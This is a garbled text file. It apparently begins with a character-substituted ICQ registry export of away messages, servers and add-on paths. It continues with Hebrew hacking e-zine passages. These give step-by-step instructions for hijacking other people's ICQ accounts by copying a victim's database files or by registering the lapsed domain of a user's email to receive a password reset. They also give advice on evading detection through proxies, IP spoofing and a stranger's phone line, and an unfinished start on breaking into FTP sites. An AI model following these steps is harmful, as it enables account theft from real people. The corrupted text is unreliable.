" ,2s. Presets=sg )"@",2s.""D<D Presets=sg )"@"D<D""C6at Presets=sg )"@"C6at "
" A5a.=sg Presets ("@"I a7 o2t to l2nc61 I 5ill ret2rn s6ortl. "1
" &2t=sg Presets ( ""@"
" D<D=sg Presets ("@"I a7 c2rrentl. in a 7eeting1 I canPt >e dist2r>ed "1
" C6at=sg Presets ("@"Co7e Goin 7. c6at roo7R""A5a. Presets=sg ("@"L2nc6 "
" &2t Presets=sg ("@"<ot 6ere"",2s. Presets=sg ("@"=eeting "
" D<D Presets=sg ("@"=eeting""C6at Presets=sg ("@"Co7e In "
" A5a.=sg Presets "@"DonPt go an.56ereR IPll >e >acA in a Siff. "R
" &2t=sg Presets "@"IP7 closed for t6e 5eeAendO6olida.s "1
" D<D=sg Presets "@"DonPt dist2r> 7. concentration "R
" C6at=sg Presets "@"DonPt 7iss o2t on t6e f2nR Goin o2r c6at "R
" A5a. Presets=sg "@",e rig6t >acA""&2t Presets=sg "@"Closed "
" ,2s. Presets=sg "@"Concentration""D<D Presets=sg "@"Concentration "
" C6at Presets=sg "@"F2n "
" A5a.=sg Presets 3"@"IP7 o2t 5it6 t6e dog1 ,e >acA 56en 6ePs finis6ed "1
" &2t=sg Presets 3"@"Cone fis6in "1P
" D<D=sg Presets 3"@"IP7 on t6e p6one 5it6 a ver. i7portant client1 DonPt dist2r> 7e "R
" C6at=sg Presets 3"@"$6at are .o2 5aiting for? Co7e on in "R
" A5a. Presets=sg 3"@"Dog $alA""&2t Presets=sg 3"@"Fis6ing "
" ,2s. Presets=sg 3"@"&n t6e P6one""D<D Presets=sg 3"@"&n t6e P6one "
" C6at Presets=sg 3"@"DonPt $ait""A5a.=sg Presets *"@"$ent o2t for a s7oAe " 1
" &2t=sg Presets *"@"IP7 sleeping1 DonPt 5aAe 7e "1
" D<D=sg Presets *"@"I canPt c6at 5it6 .o2 no51 IP7 >2s. "1
" C6at=sg Presets *"@"$ePd love to 6ear 56at .o2 6ave to sa.1 Goin o2r c6at "1
" A5a. Presets=sg *"@"S7oAe""&2t Presets=sg *"@"Sleeping "
" ,2s. Presets=sg *"@"CanPt c6at ""D<D Presets=sg *"@"CanPt c6at "
" C6at Presets=sg *"@"-ear""A5a.=sg Presets !"@"&n 7. Coffee >reaA "1
" &2t=sg Presets !"@"$ent 6o7e1 -ad to feed t6e Aids "1
" D<D=sg Presets !"@"CanPt .o2 see IP7 5orAing "?
" C6at=sg Presets !"@"+nter .o2r c6at roo7 7essage 6ere "
" A5a. Presets=sg !"@"Coffee""&2t Presets=sg !"@"'ids "
" ,2s. Presets=sg !"@"$orAing""D<D Presets=sg !"@"$orAing "
" C6at Presets=sg !"@"+7pt.""A5a.=sg Presets 4"@"$ent to get so7e fres6 air "1
" &2t=sg Presets 4"@"Cone for good "1
" D<D=sg Presets 4"@"+nter .o2r occ2pied 7essage 6ere "
" C6at=sg Presets 4"@"+nter .o2r c6at roo7 7essage 6ere""A5a. Presets=sg 4"@"Air "
" &2t Presets=sg 4"@"Cone"",2s. Presets=sg 4"@"Conversing "
" D<D Presets=sg 4"@"+7pt.""C6at Presets=sg 4"@"+7pt. "
" ,2s.=sg Presets #"@";ser is occ2pied1 &nl. 2rgent 7essages 5ill >e delivered "1
" D<D=sg Presets #"@"+nter .o2r occ2pied 7essage 6ere "
" C6at=sg Presets #"@"+nter .o2r c6at roo7 7essage 6ere "
" A5a. Presets=sg #"@"+7pt.""&2t Presets=sg #"@"+7pt."",2s. Presets=sg #"@"+7pt. "
+.=
" D<D Presets=sg #"@"+7pt.""C6at Presets=sg #"@"+7pt. "
" ,2s.=sg Presets )"@";ser is c2rrentl. &cc2pied "
" C6at=sg Presets )"@"I 5o2ld liAe to c6at a>o2t an.t6ing "
" ,2s.=sg Presets ("@";ser is c2rrentl. &cc2pied( "
" ,2s.=sg Presets "@";ser is c2rrentl. &cc2pied "
" ,2s.=sg Presets 3"@";ser is c2rrentl. &cc2pied "
" ,2s.=sg Presets *"@";ser is c2rrentl. &cc2pied "
" ,2s.=sg Presets !"@";ser is c2rrentl. &cc2pied "
" ,2s.=sg Presets 4"@";ser is c2rrentl. &cc2pied "
" A5a.=sg Presets #"@";ser is c2rrentl. a5a. "
" &2t=sg Presets #"@";ser is c2rrentl. <OA "
" A5a.=sg Presets )"@";ser is c2rrentl. a5a.\r\n9o2 can leave 6i7O6er a 7essage "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD B
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage) B
" =essage"@"Please >ooA7arA o2r net5orA stat2s page "1
" ;%L<a7e"@"6ttp:OO55517ira>ilis1co7Ostat2s16t7l"";%L"@"press 6ere""Date ""@"
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage( B
" ;%L<a7e"@"6ttp:OO55517ira>ilis1co7Oe7ailsig16t7l "
" ;%L"@"Co to t6e IC? e/7ail signat2re generator""Date ""@"
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage B
" =essage"@"IC? is doing it againR &ne 7ore ne5 service fro7 IC? for .o2r pleas2reR Create .o2r IC?
interest gro2p / 6o7eN 5orAN fa7il.N 6o>>.N affiliationN sportsN 72sic111etc11( ItPs straig6t for5ardN no
-T=L needed "( R
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO)16t7l "
" ;%L"@"ItPs f2n and eas.N C&RR""Date"@"3(/=A%/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage3 B
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO56itepages16t7l"";%L"@"Co "R
" Date"@"(/AP%/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage* B
" =essage"@"IC? can notif. .o2 56en .o2 receive an e/7ail and s6o5 .o2 t6e e/7ail 6eadersR Learn
6o5 to do it "R
" ;%L<a7e"@"6ttp:OO55517ira>ilis1co7Oe7ail16t7l "
" ;%L"@"+/7ail notification instr2ctions""Date"@"(!/G;</0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage! B
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO)!16t7l"";%L"@"Create .o2r Creeting "
" Date"@"(/G;L/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage4 B
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO)416t7l "
" ;%L"@"ClicA For =ore Infor7ation""Date"@"4/A;C/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage# B
" =essage"@"IC? can alert .o2 56en .o2 receive +7ails and s6o5 .o2 t6e +7ail 6eaders "R
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO)#16t7l"";%L"@"Learn 6o5 to do it "
" Date"@")4/S+PT/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\=&TD\=essage" B
" ;%L<a7e"@"6ttp:OO5551icT1co7Oanno2nce7entsO)416t7l "
" ;%L"@"ClicA For =ore Infor7ation""Date"@")/&CT/0" "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps B
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
( B
" <a7e"@"Ceneral C6at""<27>er"@d5ord:)))))))("Dersion"@d5ord:)))))))(
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
B
" <a7e"@"%o7ance""<27>er"@d5ord:)))))))"Dersion"@d5ord:)))))))
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
3 B
" <a7e"@"Ca7es""<27>er"@d5ord:)))))))3"Dersion"@d5ord:)))))))3
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
* B
" <a7e"@"St2dents""<27>er"@d5ord:)))))))*"Dersion"@d5ord:)))))))*
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
! B
" <a7e"@") So7et6ing""<27>er"@d5ord:)))))))4"Dersion"@d5ord:)))))))4
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
4 B
" <a7e"@"3) So7et6ing""<27>er"@d5ord:)))))))#"Dersion"@d5ord:)))))))#
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
# B
" <a7e"@"*) So7et6ing""<27>er"@d5ord:)))))))""Dersion"@d5ord:)))))))"
+.J
8
-'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\%ando7Cro2ps\%ando7Cro2p
" B
" <a7e"@"!) Pl2s""<27>er"@d5ord:)))))))0"Dersion"@d5ord:)))))))0
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\Servers B
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\Servers\Server( B
" -ost"@"icT(17ira>ilis1co7""Port"@d5ord:)))))fa)
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals B
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\Canasta B
" T.pe"@"Co77and""Co77and Line"@"Oip ":
" Pat6"@"C:\\Progra7 Files\\Canasta\\Canasta1eHe "
" ;%L"@"6ttp:OOo2r5orld1co7p2serve1co7O6o7epagesO76arte""Dersion"@d5ord:)))))))f
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\ConnectiH
DideoP6one B
" T.pe"@"+Htension""For7at"@"Op:tcp Oac:""+Htension"@"cvp "
" ;%L"@"6ttp:OO5551connectiH1co7O6t7lOvideop6one16t7l""Dersion"@d5ord:)))))))0
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\C2/See7e B
" T.pe"@"Co77and""Co77and Line"@"""Pat6"@"C:\\C;S++=+\\C;S++=31+F+ "
" ;%L"@"6ttp:OO5551c2/see7e1co7O""Dersion"@d5ord:)))))))4
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\I%IS P6one B
" T.pe"@"+Htension""For7at"@"""+Htension"@"ir2"";%L"@"6ttp:OOirisp6one1co7 "O
" Dersion"@d5ord:)))))))a
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\=icrosoft DC6at B
" T.pe"@"Server+Htension""For7at"@"(1(\\n/2 ( /a ""+Htension"@"vce "
" <27Para7eters"@d5ord:)))))))"Server("@"vc6at(17icrosoft1co7 "
" ;%L"@"6ttp:OOvc6at(17icrosoft1co7""Dersion"@d5ord:))))))((
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\=icrosoft
DC6at\Para7( B
" Para7<a7e"@"$orld""Can&t6erC6ange"@"<o""Para7("@"ICo7pass""Para7"@"I,2g$orld "
" Para73"@"IFis6>o5l""Para7*"@"ILodge""Para7!"@"IL2nar""Para74"@"ILodge "
" Para7#"@"IPractice""Para7""@"I%edDen""Para70"@"ITa>leTop "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\=icrosoft
DC6at\Para7 B
" Para7<a7e"@"Avatar""Can&t6erC6ange"@"9es""Para7("@"A7ani""Para7"@"Anderson "
" Para73"@",r>""Para7*"@"Cat""Para7!"@"Cra>""Para74"@"Dancer""Para7#"@"Dred "
" Para7""@"D2ggan""Para70"@"Goe.""Para7()"@"L2l2 "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\<etscape CoolTalA B
" T.pe"@"Co77and""Co77and Line ""@"
" Pat6"@"C:\\Progra7 Files\\<etscape\\<avigator\\CoolTalA\\CoolTalA1+F+ "
"
;%L"@"6ttp:OO6o7e1netscape1co7Oco7prodOprod2ctsOnavigatorOversion:31)Oco772nicationOcooltalAOind
eH16t7l "
" Dersion"@d5ord:)))))))*
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\%iAAen on t6e
%ocAH B
" T.pe"@"ClientServer""Client Co77and Line"@"OCLI+<T Ui "
" Server Co77and Line"@"OS+%D+%""Client Pat6"@"C:\\%iAAen\\%iAAen1eHe "
" Server Pat6"@"C:\\%iAAen\\%iAAen1eHe"";%L"@"6ttp:OO5551dse1nlOVra7onOriAAen "O
" Dersion"@d5ord:))))))(#
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\DD&P6one B
" T.pe"@"+Htension""For7at"@"callto:OO""+Htension"@"vdp "
" ;%L"@"6ttp:OO5551vdo1netOdo5nloadO""Dersion"@d5ord:)))))))3
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\DidCall B
" T.pe"@"Co77and""Co77and Line"@"""Pat6"@"C:\\DidCall\\Corp1+F+ "
" ;%L"@"6ttp:OO5551access1digeH1netOVvidcallOvidcall16t7l "
" Dersion"@d5ord:)))))))"
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\$e>P6one B
" T.pe"@"+Htension""For7at"@"""+Htension"@"5pc"";%L"@"6ttp:OO55515e>p6one1co7 "O
" Dersion"@d5ord:)))))))#
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\?2aAe B
" T.pe"@"ClientServer""Client Co77and Line"@"/7pat6 Wconnect Ui "
" Server Co77and Line"@"/7pat6 /listen""Client Pat6"@"c:\\T2aAe:s5\\?0!1>at "
" Server Pat6"@"c:\\T2aAe:s5\\?0!1>at""Server("@"T2aAe1H7isson1co7 "
" ;%L"@"6ttp:OO5551idsoft5are1co7""Dersion"@d5ord:))))))()
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\DoHC6at B
" T.pe"@"ServerCo77and""For7at"@"C%&;P<A=+@i P&%T@(!))) "
" Pat6"@"C:\\Progra7 Files\\DoHC6at\\DoHC6at1eHe""<27Para7eters"@d5ord:)))))))(
" Server("@"voHc6at(1voH5are1co7""Server"@"voHc6a1voH5are1co7 "
" ;%L"@"6ttp:OO5551voHc6at1co7Olo5Odo5nload16t7 "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\+Hternals\DoHC6at\Para7( B
" Para7<a7e"@"%oo7""Can&t6erC6ange"@"<o""Para7("@"IIC? "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Prefs\P6oneLocations B
" Last;pdate"@d5ord:))))))))
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\=ain B
" SelectedCell"@d5ord:))))))))"Al5a.s&nTop"@"9es""Left,ar$idt6"@d5ord:))))))ad
+.N
" %ig6t,ar$idt6"@d5ord:))))))ad"Float,ar/Left"@d5ord:)))))!!
" Float,ar/%ig6t"@d5ord:)))))3)#"Float,ar/Top"@d5ord:))))))33
" Float,ar/,otto7"@d5ord:)))))(f3"State"@"Floating""=ini7iEed"@"<o "
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\$indo5s B
" %esponse"@d5ord:))"f))c0"Searc6$iE"@d5ord:))4f))c)"<otif.$iE"@d5ord:))4f))c)
" pos<ovice"@d5ord:))03))dc"pos=&TD"@d5ord:))af))>#"pos=en2Config"@d5ord:))a0))e#
" %e7ove;I<"@d5ord:))>>)()""=essage"@d5ord:))">))*f"Sec2rit."@d5ord:))#*))>*
" Prefs"@d5ord:))#f))ae"-istor."@d5ord:))04))3a"File %eT2est"@d5ord:))0)))f)
" FileTransfer"@d5ord:))0#))ae"Info"@d5ord:))03))d"Fetc6;ser"@d5ord:))e0)()e
" ;%L =essage"@d5ord:))a)))40"A5a."@d5ord:))>d))f#"C6at %eT2est"@d5ord:))0f))dd
" Contacts List"@d5ord:))"3))>d"C6at"@d5ord:))">))f!"P6one"@d5ord:)))a)))a
" P6one Call %eT2est"@d5ord:))##))e!
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\Searc6 B
" Place"@d5ord:))a*))cc"T.pe"@d5ord:)))))))"$idt6"@d5ord:)("")(""
8 -'+9:C;%%+<T:;S+%\Soft5are\=ira>ilis\IC?\&5ners\-AC'+D;I<\IC? C6at B
" C6atSt.le Co2nter"@d5ord:)))))))3"Pen Color"@d5ord:))")ffff
" ,acA Color"@d5ord:))))*)))"Send Foc2s"@"9es""+na>le So2nds"@"9es "
" <a7e ,ars"@"9es""Al5a.s &n Top"@"<o""A2toColor"@"<o""&ver%ide For7at"@"9es "
" S6o5 Tool>ar"@"9es""State"@d5ord:)))())))"<e5 Font <a7e"@"Ti7es <e5 %o7an "
" C6ar Set"@d5ord:))))))))"I%CList$idt6"@d5ord:)))))))4
" Font Pitc6"@d5ord:))))))("<e5 Font -eig6t"@d5ord:)))))))e
" Font +ffects"@d5ord:))))))))"A2toColor )"@d5ord:))))))))
" A2toColor ("@d5ord:))))))")"A2toColor "@d5ord:))))")))
" A2toColor 3"@d5ord:))))")")"A2toColor *"@d5ord:))")))))
" A2toColor !"@d5ord:))")))")"A2toColor 4"@d5ord:))")")))
" A2toColor #"@d5ord:))")")")"A2toColor ""@d5ord:))c)c)c)
" A2toColor 0"@d5ord:))))))ff"A2toColor ()"@d5ord:))))ff))
" A2toColor (("@d5ord:))))ffff"A2toColor ("@d5ord:))ff))))
" A2toColor (3"@d5ord:))ff))ff"A2toColor (*"@d5ord:))ffff))
" A2toColor (!"@d5ord:))ffffff"Place/Left"@d5ord:)))))))a
" Place/%ig6t"@d5ord:)))))(fe"Place/Top"@d5ord:)))))))a
" Place/,otto7"@d5ord:)))))(a"<e5 LogFile na7e"@"IC?C6atLog1tHt "
" <e5 SaveFile na7e"@"IC?C6atSave1tHt "
+ credit abt the reg ke) to httIh//i%a4/deVil crew ,
3 %בוקכ %בוקה תא ורמש . RG .
.התוא ורגס החותפ ויקיסיא תנכות םכל שי םא 0000
: ( הלחתהב םתגשהש םיצבקה תא וקיתעה . id',dat - ה תיקיתל ) $B
( .םכלש ויקיסיאה לש e'% ch<Irogra}+<icO<db )
= %בוקה תא וצירה. RG " ןכ ושיקה ...הלבהלב..םכנוצרב םא םכתא לאשי הז .התע הז םתבתכש
J - ה תנכות תא וצירה . dbconVert #רד וא(הלחתהה טירפתב ויקיסיאה לש טירפתה #רד
.)המצע היקיתה
$ לע וצחל &onVert a old $B
שדחה שמתשמה םע ויקיסיאה תא תיטמוטוא חותפל רומאו ןשיה יונמה תא לסחל ליחתי הז
.)ןברוקה(
.םכמצעב תאז וחתפ ! דבל חפתנ אל הז םא
$ תאז ושע םכלש ןברוקה לש רפסמה לע ןיידע דבוע אל הז םא
click ,&g 4enu, click on u"dd/&hange &urrent Mseru, then click on u&hange the
"ctiVe Mser .
&hoose the M,N oQ the Victi4 .
$ תוירקיע תוביס יתש שי . םילאוש םתא הרוק הז המל !אמסיס םכממ שקבל לוכי הז
.םירבד וילע תולגלמ וחכשת זא וילע םישבלתמ םתאש רפסמה לע םיקארק תנגה הלעפוה .א
םצעב םתא זאו .ןייל-ףוא היהי אוהש דע תוכחל םיכירצ םתא זא ןיילןוא אצמנ רפסמה .ב
" .איה(אוה
" החלצהב
יע ףסות #he!M6$ ל הדותו .ןוגראל רזועו בורק רבח - Rul3R .ףסותה לש חוסינה לע
$ויקיסיא ירפסמ לש תואמסיס תגשה
תמייק אלש תבותכ ולש ליאמ-יאב בתכש שמתשמ אוצמל קר #ירצ . #ירצ המ icO גישהל ליבשב
ב רפסמ
$אמגודל
+..
$לשמל םשר והשימ םא
asdQkasdQ%co4
ליאמ-יא םג םיאיבמ םהו םניחב םינימוד םושרל םיאיבמש םירתאהמ דחאל םיסנכנ
( www%na4ede4o%co4 / www%na4e(ero%co4 )
תבותכה תא םימשור םשו
asdQ%co4
תאזה תבותכה תא םימשורש ירחא
ןימודה תא םתמשר ובש רתאב ראוד ןובשח םיחתופ
היהי םיחתופ םתאש ראודהשו
asdQkasdQ%co4
ראודה תבותכ תא םיחתופש ירחא
$ רתאל םיסנכנ www%icO%co4/Iassword
םתרחבש ימ לש icO ה רפסמ תא םיבתוכ םשו-
ןוכנ םיבלשה לכ תא םתישע םא
םכלש ראודל חלשת רפסמה לש אמסיסה
( asdQkasdQ%co4 )
רוכזל לק היהיש #לש ישיאה)ןופלטה רפסמ םג אוהש רפסמ תחקל יאדכ $תועצה
יע בתכנ #he!M6$ יע חסונ ! Rul3R לש טסקטל ףסותכ סנכנו Pirs[i]ng .
ל רחא רבד לכ וא תושקב #he !M6$ $ל חולשל
#heM6$khot4ail%co%il
By The-MOD
+.;
המגוד ) הצירפ איה המ
$הז #ירדמב המ
. המלו . הצירפ הז המ 0
. הצירפה ןמזב רהזיהל #יא 0
0 Pro')
.תואמסיס %בוק תאצוהו יפ.יט.ףא ירתא הצירפ לע רבסה 0
.םיצלמומ עדימ ירגאמ 0
. המלו . הצירפ הז המ
.םשל השיג #ל ןיאש םוקמל השיג בונגל(הסינכ איה הנוכנ תירבעב הצירפ
!םש תויהל השרומ אל התאש תשר(תכרעמ(רוזא(םוקמל סנכיהל
.תשר(תכרעמ(רוזא(םוקמל הצירפ יע סנכנ התא תאז לכב התא לבא
לודג שממ רופיס תושועש תונידמ שיו !םייתימאה םייחב םגו םיבשחמב םג תיקוח אל איה הצירפ
.הזמ
!ספתנ התא הינטירבב םא לבא #תוא םיספות םע שארה לע ףטוח #כ לכ אל התא לארשיב לשמל
.םייחה םה הככ לבא רבד ותוא אל הזש םיעדוי םלוכש תורמל !טסירורט ומכ שנוע לבקמ התא
.דוקה יוניש םימעפל ףאו עבק תשר(תכרעמ(רוזא(םוקמ להנמש דוקה לוליח איה תויללכב הצירפ
רודחל רקאהל רזועו שמשמ אוהו םירקאה לע בוהא אשונ אוה רודקאב
.תשר(תכרעמ(רוזא(םוקמל
רתוי רחא בשחמ לע והשמל השיג )כדב( ומצעל רשפאל ידכ ןווכמב סינכה והשימש דוק תורוש
..תולקב
ועצביש תועובק תודוקפ םש בותכל ול ןתיו םייוסמ יפ יאל קר םייוסמ טרופ חתפיש דוק אמגודל
.עבק רודקאבה ןיכמש המ יפל יהשלכ הלועפ
םיפסונ המכ םיניכמו הז תא םילצנמ רודקאבה תא ואצמ רשא םירקאה םימעפל
.רתוי הטושפ היהת תכרעמל האבה הצירפהש ידכ
. תעדל םיצור םתא םיצרופ המל
.%ורפל םישנא לש ןוצרל תוירוגטק יתש שיש בשוח ינא
תא םישל וא סורהל ידכ תשר(תכרעמ(רוזא(םוקמל %ורפי אל בוט רקאה - בוט רקאה .א
!ולש תמתוחה
%ורפי אל אוה !'וכ ונממ דחפל #ירצו %רפ אוהש תושדחב ואריש תופצלו ולש םשה תא םישל
.הער הרטמ ליבשב
היעב ול שיש תתשרה להנמל תוארהל ידכ תשר(תכרעמ(רוזא(םוקמל ללכב םא !%ורפי אוה
.והשפיא
""" בוט תושעל איה ולש הרטמה .והשמ סורהי וא םיגולה תא קחמי אלו תמתוח ריאשי
$םיקלח ינשל קלחתמ הז ה
+ .והשכיא ותוא רפ'צי ילוא ףאו היעבה לע ול עידוהש רקאהל הדוי תשרה להנמ .
9 םיקלח ינש דועל תצפתמ הז םשמו תויושרל וילע חוודיו הבוטכ תא לבקי אל תשרה להנמ .
.)הטמל רתוי ולכתסת(
%ורפי אוה !בוטה רקאההמ )אלש וא( םלשומה #פהה אוה - ער רקאה .ב
!ידכ תשר(תכרעמ(רוזא(םוקמל
.וילא עיגה אוהש המ תא סורהלו )םזגומ תצק( רורט טילשהל
.הלב הלבו !הלב הלבש ללגב הז תא סרה אוהש תמתוח ריאשי אוה
( םיגולה תא קחמיו תכרעמב םיצבקה לכ תא סורהי אוהש יאדוול בורק 76G3 .)
.ער רבד אוהש !וממז תא השעי קר אלא בוט רבד םוש השעי אל אוה
.םיקלח ינשל לצ,תמ ןיינעה הפמ
+ בשחמב עגי אל !שנוע לבקי אוה !טפשמ היהי !ותוא וסנקי ! ותוא וספתי . 9* .הנקזמ תומיו הנש
9 הז םשמו רתא דוע סורהי אוה !שנעי אל אוה !טפשמ היהי אל !ותוא וסנקי אל !ותוא וספתי אל .
.#ישממ
.רבכ ידמ רתוי אוהש תונידמ שי לבא ! דבכ דימת אוה הצירפ לע שנועה .אל ילואו וספתי ילוא
... -ל הדות
. הצירפה ןמזב רהזיהל #יא
+;*
.רהזיהל #יא םיעדוי םתאש םיחוטב םתא םא אלא %ורפל יאדכ אל ללכב !בושח יכה לכ םדוק
.םכמצע לע ןגהל תודמחנ תוטיש המכ הפ הנה
0 גייחל םירמואש הלאכ שיו !תיבהמ %ורפל אל םירמואש םישנא הלאכ שי :3 הפיאמ ורתאי אלש
.רשקתמ התא
.תצקמב םינוכנ הלא לכ
0 !ישיא עדיל 2 :3 0 ענומ אלא החישה תא םסוח אל :9 ענומ הז םיליגר ההוזמ החיש ירישכמב .
!רפסמה תגצה תא
0 ענמי הז יניצר דויצ ול שיש המ לכו טנרטניא תורבחב לבא :9 .רתוי אלו
$הנה זא םיצור םתא הרקמ לכב םא לבא הז תא תושעל אל איה !ספתיהל אל הבוט יכה הטישה
+ .םכלש קסמ טנבס ( טסוה ( יפיאה תא תווסהל וסנת .
0 #רד אל ! טנרטניאל םירבחתמ םתא וילעש ןופלט רפסמה תא וליפא םילוכי םתא םא :3 אלא
.םיריכמ םתא םא תורחא םיכרד
9 ( .םכילא עיגהל השק היהיש ידכ רודיש תונחת רתויש המכ #רד ורבחתת . Iro') .)'וכו
3 .וילא ועיגי אל הנש דוע םגש םכלש יפיאל קזח שממ פופס ושע .
: תויהל םילוכי םתאש םוקמ םכל שי םא !יולת הז לבא רזוע תמאב הז יכ תיבהמ %ורפל אל וסנת .
!ןמז הברה םש
.הז לע וכל זא !השעמה רחאל םכילא ועיגי אל וא םכב ושדחי אלו
= רבחתהל םשמו והשימ לש ןופלט וקל רבחתהל איה ! הבוט יכה יתעדל הטישה ןכ ומכ .
.םכממז תא תושעלו טנרטניאל
. תשרה יבחרב עדימ ושפחו ונלש גניקירפה יטסקטל וכל הז לע תושעל #יא עדימ דועל
Pro') .
ודיקפתו ויתוחוקל ןעמל )'וכו תולודג תורבח !טנרטניא תורבח( תוריש יקפס ידי לע םקומה תרש
רוציל
ריהמ רוביח יסקורפה תרשל .םישלוגה תשקב יפ לע עדימ םהמ ףולשלו תשרב םיבשחמ םע רשק
רתוי הברה
.ונממ םיצבק תלבקל הברהב ריהמ םוקמכ שמשמ ןכלו םדומה םע עוצממה שלוגה לשמ
םישלוגל #סוח #כבו !יסקורפה תרשב רמשנ %בוקה - %בוק ותוא תא םישקבמ םישנא הברה םא
הנתמהה תא
שמשל םילוכי םה ןכלו הנגה םג שי יסקורפ יתרש לע .קחורמה טנרטניאה תרשמ עדימה תלבקל
.לוורייפכ
$דבוע הזה ןיינעה לכ הככ
P&!M6$M 2 !!!!!j 2 PR6KL 2 !!!!!j 2 3,# 4 4

.תואמסיס %בוק תאצוהו יפ.יט.ףא ירתא הצירפ לע רבסה
( יפ.יט.ףא םצעב והמ -#P . )
-#P ! -ile #ransIort Protocol םיצבק תרבעהל םירחא תאו ונתוא שמשמ רשא לוקוטורפ אוה !
.טנרטניאב
! ימינונאכ סנכיהל םג רשפא !אמסיסו שמתשמ םש #ירצ והשימ לש יפ.יט.ףא רתאל תשגל ידכ
.חרוא
!רתאב שיש המ לכו שיש המש תופצל קר לכות דימתש יאדוול בורק חרואכ סנכנ התא םא לבא
.ישיאה #בשחמל הז תא דירוהל רשפא יא .דבלב האירק בצמל תויהל #פוה
+;+
